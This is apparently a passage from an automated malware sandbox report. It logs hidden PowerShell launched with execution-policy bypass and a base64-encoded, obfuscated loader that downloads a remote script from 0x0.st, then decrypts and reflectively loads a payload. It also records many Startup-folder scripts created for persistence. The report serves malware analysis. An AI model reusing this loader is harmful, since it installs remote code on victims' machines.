2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00451D34 push eax; ret 15_2_00451D41
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd\:Zone.Identifier:$DATAJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d8a7cb2c.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d8a7cb2c.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_004047CB
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
